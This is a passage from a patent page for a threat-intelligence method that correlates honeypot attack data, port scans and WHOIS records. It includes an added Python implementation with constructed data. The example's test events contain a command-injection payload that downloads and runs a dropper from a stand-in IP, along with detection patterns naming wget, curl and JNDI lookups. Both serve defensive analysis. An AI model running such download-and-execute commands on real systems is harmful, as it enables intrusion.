wherein the IP attack information data includes: the attacker source IP, the attacker source port, the attacker's HTTP request method, the service type of the attacker's target, the attacker's target port, the userAgent of the attacker's HTTP request, the URL address requested by the attacker, and the value of the POST packet sent by the attacker;
wherein the IP port service information data includes: the ports opened on the target IP, response packet details, service names and version information;
wherein the IP basic information data includes the geographic location of the target IP, the domain name resolved from the target IP, the registrant of that domain name and the mailbox of that domain name;
and wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information includes:
matching URL addresses in the value of the POST packet sent by the attacker to obtain a first URL address set;
filtering normal websites out of the first URL address set using a white list to obtain a second URL address set;
downloading the file associated with each URL address in the second URL address set;
and scanning each downloaded file with an antivirus engine, wherein if the scanning result indicates that the file associated with a URL address is malicious, the URL address is stored in the Trojan download address field of the current IP address, and the hash value of the malicious file together with the scanning result is stored in a sample set.
2. The method of claim 1, wherein, after acquiring the IP port service information data, the IP attack information data and the IP basic information data and analyzing them to generate the IP context information, the method further comprises:
associating and storing the IP port service information data, the IP attack information data and the IP basic information data by unique IP address.
3. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
comparing the value of the POST packet sent by the attacker with preset vulnerability characteristics; if the value hits a preset vulnerability characteristic, marking the vulnerability type on the current IP address and determining that the current IP address has carried out a penetration attack.
4. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the attacker's HTTP request method is GET, and comparing the IP attack information data with the vulnerability characteristics;
when the attacker's HTTP request method is GET and the comparison shows that no exploit characteristic is present in the IP attack information data, determining that the current IP address has carried out a scanning attack.
5. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the number of distinct userAgents in the attacker's HTTP requests exceeds 5 and, if so, determining that the attacker has carried out an automated scanning attack with evasion capability;
judging whether the userAgents of the attacker's HTTP requests carry botnet character features and, if so, tagging the current IP address with the corresponding botnet family.
6. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the ports opened on the target IP include port 22 and, if so, determining that the current IP address is the IP address of a Linux server;
and judging whether the ports opened on the target IP include port 3389 and, if so, determining that the current IP address is the IP address of a Windows server.
7. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the domain name resolved from the target IP, the registrant of that domain name and the mailbox of that domain name contain data and, if so, storing the domain name, the registrant and the mailbox.
8. An IP information processing apparatus, characterized in that the apparatus comprises:
the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
the analysis module is used for analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information;
wherein the IP attack information data includes: the attacker source IP, the attacker source port, the attacker's HTTP request method, the service type of the attacker's target, the attacker's target port, the userAgent of the attacker's HTTP request, the URL address requested by the attacker, and the value of the POST packet sent by the attacker;
wherein the IP port service information data includes: the ports opened on the target IP, response packet details, service names and version information;
wherein the IP basic information data includes the geographic location of the target IP, the domain name resolved from the target IP, the registrant of that domain name and the mailbox of that domain name;
and wherein the analysis module analyzes the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information in the following manner:
matching URL addresses in the value of the POST packet sent by the attacker to obtain a first URL address set;
filtering normal websites out of the first URL address set using a white list to obtain a second URL address set;
downloading the file associated with each URL address in the second URL address set;
and scanning each downloaded file with an antivirus engine, wherein if the scanning result indicates that the file associated with a URL address is malicious, the URL address is stored in the Trojan download address field of the current IP address, and the hash value of the malicious file together with the scanning result is stored in a sample set.
9. An electronic device, comprising:
a processor; and
a memory configured to store machine-readable instructions that, when executed by the processor, perform the IP information processing method of any one of claims 1 to 7.
10. A storage medium storing a computer program which, when executed by a processor, implements the IP information processing method according to any one of claims 1 to 7.
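The four-step URL pipeline of claim 1 and the tagging rules of claims 3 to 7, worked through in Python as an added example; this is not code from the patent or from ThreatBook. Everything in it is constructed: the honeypot events, port-scan results and WHOIS record use documentation address space; the vulnerability signatures, the botnet userAgent signature and the white list are assumptions, since the claims name these tables without listing their contents; field names such as `src_ip`, `post_body` and `trojan_download_urls` are likewise assumed; and the "download the file and scan it with an antivirus engine" step is replaced by an offline URL-to-bytes map plus a SHA-256 denylist so that the block runs without network access.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>;|&]+")

# Constructed rule tables (assumptions): the claims refer to "preset vulnerability
# characteristics", "botnet character features" and a "white list" without listing them.
VULN_SIGNATURES = {
    "command-injection": re.compile(r"(;|\|\||&&)\s*(wget|curl|chmod|sh)\b"),
    "jndi-lookup": re.compile(r"\$\{jndi:", re.IGNORECASE),
}
BOTNET_UA_SIGNATURES = {"ExampleBotFamily": re.compile(r"^Hello, world$")}
WHITELIST_HOSTS = {"www.example.com", "example.org"}
MAX_PLAIN_UAS = 5  # claim 5: more than five distinct userAgents from one source IP

# Offline stand-ins for "download the file" and "scan it with an antivirus engine":
# a constructed URL -> bytes map and a SHA-256 denylist that supplies the verdict.
CONSTRUCTED_DOWNLOADS = {"http://198.51.100.9/bins/x86": b"\x7fELF constructed dropper, not a real sample"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


MALICIOUS_HASHES = {sha256_hex(CONSTRUCTED_DOWNLOADS["http://198.51.100.9/bins/x86"]): "Trojan.Constructed.ELF"}


def fetch(url: str):
    """Stand-in downloader; a real one runs on an isolated egress host and never executes the file."""
    return CONSTRUCTED_DOWNLOADS.get(url)


def av_scan(data: bytes):
    """Stand-in antivirus engine: returns a detection name or None."""
    return MALICIOUS_HASHES.get(sha256_hex(data))


def extract_post_urls(events):
    """Claim 1: URLs matched in POST values form the first set; dropping white-listed hosts gives the second."""
    first = {u for e in events if e["method"] == "POST" for u in URL_RE.findall(e["post_body"])}
    second = {u for u in first if urlparse(u).hostname not in WHITELIST_HOSTS}
    return first, second


def new_context():
    return {"tags": set(), "vuln_types": set(), "botnet_families": set(),
            "trojan_download_urls": set(), "os_guess": set(), "geo": None, "whois": {}}


def build_ip_context(events, port_services, basic_info):
    """Return (context keyed by IP, sample set keyed by SHA-256) following claims 1 and 3 to 7."""
    ctx, samples, by_ip = defaultdict(new_context), {}, defaultdict(list)
    for e in events:
        by_ip[e["src_ip"]].append(e)  # claim 2: every record is associated by the unique IP
    for ip, evs in by_ip.items():
        c = ctx[ip]
        for url in sorted(extract_post_urls(evs)[1]):  # claim 1: download and scan the filtered set
            data = fetch(url)
            verdict = av_scan(data) if data is not None else None
            if verdict:
                c["trojan_download_urls"].add(url)
                samples[sha256_hex(data)] = verdict
        user_agents = set()
        for e in evs:
            user_agents.add(e["user_agent"])
            hits = {n for n, rx in VULN_SIGNATURES.items() if rx.search(e["url"] + " " + e["post_body"])}
            if e["method"] == "POST" and hits:       # claim 3: POST value hits a vulnerability signature
                c["vuln_types"] |= hits
                c["tags"].add("penetration-attack")
            elif e["method"] == "GET" and not hits:  # claim 4: GET without exploit features is a scan
                c["tags"].add("scanning-attack")     # (a GET with exploit features gets no label; the claims define none)
            for family, rx in BOTNET_UA_SIGNATURES.items():  # claim 5, second rule
                if rx.search(e["user_agent"]):
                    c["botnet_families"].add(family)
        if len(user_agents) > MAX_PLAIN_UAS:          # claim 5, first rule
            c["tags"].add("automated-scan-with-evasion")
    for ip, ports in port_services.items():  # claim 6: port-based OS inference, recorded as a guess only
        if 22 in ports:
            ctx[ip]["os_guess"].add("linux-server")
        if 3389 in ports:
            ctx[ip]["os_guess"].add("windows-server")
    for ip, info in basic_info.items():  # claim 7: keep WHOIS fields only when they hold data
        ctx[ip]["geo"] = info.get("geo")
        ctx[ip]["whois"] = {k: info[k] for k in ("domain", "registrant", "email") if info.get(k)}
    return dict(ctx), samples


# Constructed inputs on documentation address space; none of this is real traffic or real WHOIS data.
EVENTS = [
    {"src_ip": "203.0.113.7", "src_port": 51234, "method": "POST", "target_service": "http", "target_port": 80,
     "user_agent": "Mozilla/5.0", "url": "/cgi-bin/luci",
     "post_body": "cmd=cd /tmp;wget http://198.51.100.9/bins/x86 -O x;chmod 777 x;./x"},
    {"src_ip": "203.0.113.7", "src_port": 51235, "method": "POST", "target_service": "http", "target_port": 8080,
     "user_agent": "Mozilla/5.0", "url": "/api/fetch", "post_body": "src=http://www.example.com/robots.txt"},
    {"src_ip": "203.0.113.9", "src_port": 6000, "method": "GET", "target_service": "http", "target_port": 80,
     "user_agent": "Hello, world", "url": "/", "post_body": ""},
] + [
    {"src_ip": "203.0.113.8", "src_port": 40000 + i, "method": "GET", "target_service": "http", "target_port": 80,
     "user_agent": f"Scanner/{i}", "url": f"/probe{i}", "post_body": ""}
    for i in range(6)
]
PORT_SERVICES = {"203.0.113.7": {22: {"service": "ssh", "version": "OpenSSH_8.2"}},
                 "203.0.113.8": {3389: {"service": "ms-wbt-server", "version": ""}}}
BASIC_INFO = {"203.0.113.7": {"geo": "ZZ", "domain": "c2.example.net", "registrant": "", "email": ""}}

if __name__ == "__main__":
    context, sample_set = build_ip_context(EVENTS, PORT_SERVICES, BASIC_INFO)
    for ip, c in sorted(context.items()):
        print(ip, {k: (sorted(v) if isinstance(v, set) else v) for k, v in c.items()})
    print("sample set:", sample_set)
```

Two caveats a practitioner would attach to the patent's rules. First, the URLs in the second set are harvested from attacker POST bodies, so the download step fetches attacker-controlled content; it belongs on an isolated egress host, the file must never be executed, and the white list only removes known-good sites, it does not make the remainder safe to handle. Second, the port 22 / port 3389 operating-system inference of claim 6 is weak on its own (OpenSSH ships with Windows, and RDP is also exposed by honeypots and proxies), which is why the example stores it under `os_guess` rather than as an established fact.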

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202310114335.5A CN115883258B (en) 2023-02-15 2023-02-15 IP information processing method, device, electronic equipment and storage medium

Publications (2)

Publication Number Publication Date
CN115883258A CN115883258A (en) 2023-03-31
CN115883258B (en) 2023-08-01

Family

ID=85761149

Country Status (1)

Country Link
CN (1) CN115883258B (en)

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2010021977A (en) * 2008-06-13 2010-01-28 Panasonic Corp Method, system, and device for network signaling
CN110149350A (en) * 2019-06-24 2019-08-20 State Grid Anhui Electric Power Co., Ltd. Information and Communication Branch Alarm-log-correlated attack analysis method and device
CN114667532A (en) * 2018-10-15 2022-06-24 PayPal, Inc. Multidimensional drift nuance intelligence threat engine

Family Cites Families (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115086330B (en) * 2022-06-14 2024-03-01 AsiaInfo Technologies (China) Co., Ltd. Cross-cluster load balancing system
CN115277102B (en) * 2022-06-29 2023-04-07 Beijing Topsec Network Security Technology Co., Ltd. Network attack detection method and device, electronic equipment and storage medium

Similar Documents

Publication Publication Date Title
US8359651B1 (en) Discovering malicious locations in a public computer network
CN110730175B (en) Botnet detection method and detection system based on threat information
Huber et al. Social snapshots: Digital forensics for online social networks
CN110099059B (en) Domain name identification method and device and storage medium
CN107347076B (en) SSRF vulnerability detection method and device
CN111104395B (en) Database auditing method, equipment, storage medium and device
CN111818103A (en) Traffic-based tracing attack path method in network target range
CN113259392A (en) Network security attack and defense method, device and storage medium
CN113923003A (en) Attacker portrait generation method, system, equipment and medium
CN110768949B (en) Vulnerability detection method and device, storage medium and electronic device
CN109309665B (en) Access request processing method and device, computing device and storage medium
CN112751804A (en) Method, device and equipment for identifying counterfeit domain name
CN110837646A (en) Risk investigation device of unstructured database
CN115865525B (en) Log data processing method, device, electronic equipment and storage medium
US20130275384A1 (en) System, method, and computer program product for determining whether an electronic mail message is unwanted based on processing images associated with a link in the electronic mail message
CN115883258B (en) IP information processing method, device, electronic equipment and storage medium
CN116455620A (en) Malicious domain name access analysis and determination method
CN115314271B (en) Access request detection method, system and computer storage medium
CN116015800A (en) Scanner identification method and device, electronic equipment and storage medium
CN113364780B (en) Network attack victim determination method, equipment, storage medium and device
CN113965392B (en) Malicious server detection method, system, readable medium and electronic equipment
CN115913634A (en) Network security abnormity detection method and system based on deep learning
JP5639535B2 (en) Benign domain name exclusion device, benign domain name exclusion method, and program
CN111371917B (en) Domain name detection method and system
CN115102785A (en) Automatic tracing system and method for network attack

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant